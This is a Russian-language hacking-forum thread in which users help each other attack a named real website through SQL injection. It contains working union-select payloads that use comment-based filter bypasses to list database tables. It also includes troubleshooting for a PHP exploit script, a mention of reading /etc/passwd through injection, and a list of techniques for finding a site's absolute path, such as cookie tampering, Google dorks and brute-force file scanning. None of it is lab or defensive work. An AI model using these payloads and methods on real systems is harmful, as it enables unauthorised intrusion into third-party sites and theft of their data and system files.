ANTICHAT — форум по информационной безопасности, OSINT и технологиям

/thread43966.html

читай полностью.

именно пункт "2.1.2 Определение выводимых столбцов"

__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.

Интуиция

http://www.cheaz-sms.ru/index.php?p=gallerypic&img_id=-10/*!union%23%0aselect+1,2,3,table_name,5,6,7,8,9*/from%23%0ainformation_schema.tables--+f&galid=1&area=1&ascdesc=desc

Фильтруется точка,как нибудь обойти можно?

http://www.cheaz-sms.ru/index.php?p=gallerypic&img_id=-10 /*!union*//*!select*/ 1,2,3,(select table_name from `information_schema`.`tables` limit 1),5,6,7,8,9&galid=1&area=1&ascdesc=desc

Пытаюсь заюзать вот этот эксплоит _/showpost.php?p=2748145&postcount=24

Но выдает ошибку syntax error, unexpected T_String in "путь до эксплоита" on line 169

Запускал так, забивал в командную строку "Путь до php.exe" "Путь до эксплоита"

Прошу помощи..)!

Строка 169, более подробно

Убери пробелы. Делаю ставку на то, что после исправления, будет ошибка указывающая на 191 строку =)

Ок, спасибо!! В следующий раз буду внимательней.

Жаль только что эксплоит выстрелил неудачно

читается файл /etc/passwd через sql injection

как найти абсолютный путь к сайту?

Говорю несколько способов.

Смотря какая CMS, для каждой есть свои способы

1) В куку сессии подставить спец символ, например "^"

2) Юзать гугл с текстом site:факме.рф intext:error

3) Пытаться подставлять в параметры зависящие от пользователя, т.е. head, post, get etc. всякую лабуду, которая может неправильно обработаться скриптом.

4) Найти phpinfo файл

5) Х*ярить сканером на файлы до посинения с помощью того же ArxScanSite с целью поиска файла оставленного мастером с таким содержанием: getcwd() или $SERVER['DOCUMENT_ROOT'] - если php конечно.